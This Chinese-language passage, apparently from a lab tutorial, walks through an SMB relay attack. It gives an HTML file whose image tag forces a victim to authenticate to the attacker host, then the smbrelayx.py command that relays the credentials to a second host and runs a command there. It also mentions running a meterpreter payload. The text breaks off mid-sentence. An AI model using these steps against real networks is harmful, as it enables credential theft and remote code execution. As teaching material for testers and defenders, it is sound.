得知受害者2@10.0.0.6已禁用SMB签名且易受到SMB中继攻击后,我们创建一个简单的HTML文件,一旦打开该文件,受害者1就会被迫对攻击者的计算机进行身份验证:
<html>
<h1>holla good sir</h1>
<img src="file://10.0.0.5/download.jpg">
</html>
注意:
还有其他强制身份验证的方法,可在以下链接中获取所需的技术。
https://www.ired.team/offensive-security/initial-access/t1187-forced-authentication
同时,启用SMBRelayx工具,该工具会侦听传入的SMB身份验证请求,将其中继到受害者2@10.0.0.6,在目标主机上执行命令:
ipconfig
smbrelayx.py -h 10.0.0.6 -c "ipconfig"
注意:
smbrelayx可以和-e选项一起使用,攻击者执行其有效载荷文件,如meterpreter可执行文件。
以下动图是这个技术的应用过程 —— 左边 ——
victim1@10.0.0.2
打开我们之前制作的恶意html,让它对攻击者系统进行身份验证(右侧)。一旦进行身份验证,它会中继到
victim2@10.0.0.6
,执行ipconfig并执: